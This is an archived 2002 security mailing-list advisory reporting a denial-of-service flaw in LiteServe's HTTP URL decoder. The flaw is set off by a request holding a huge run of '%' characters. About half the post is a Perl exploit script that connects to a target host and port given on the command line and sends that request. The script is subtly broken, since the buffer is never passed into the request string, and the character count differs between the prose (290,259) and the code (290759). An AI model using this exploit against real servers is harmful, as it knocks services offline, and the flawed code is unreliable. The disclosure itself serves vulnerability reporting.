|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Matthew Murphy (mattmurphy_at_kc.rr.com)
Date: Sun Nov 17 2002 - 15:29:53 CST
Christopher Fillion's Perception offers LiteServe, the server suite that has
recently been the subject of intensive security research. Another
vulnerability has been discovered in LiteServe. The vulnerability this time
lies in LiteServe's URL decoder, once again part of the HTTP service.
LiteServe's URL decoder has a problem handling illegal "%xx" sequences, such
as "%.
", for example, and may produce corrupted output when such a sequence
is used. The problem appears to be a referencing issue when the decode
sequence does not specify a legitamite hexadecimal sequence. A denial of
service may occur if LiteServe is passed an extremely large request
consisting only of "%" characters. 290,259 such characters will cause
LiteServe to freeze:
GET /[buffer] HTTP/1.0
After this request is processed, attempting to connect to the HTTP service
reveals that the server is dead.
Exploit:
#!/usr/bin/perl
use IO::Socket;
$buffer="%"x290759;
$req=sprintf("GET /%s HTTP/1.0\r\n\r\n");
$f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp")
;
print $f $req;
undef $f;
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]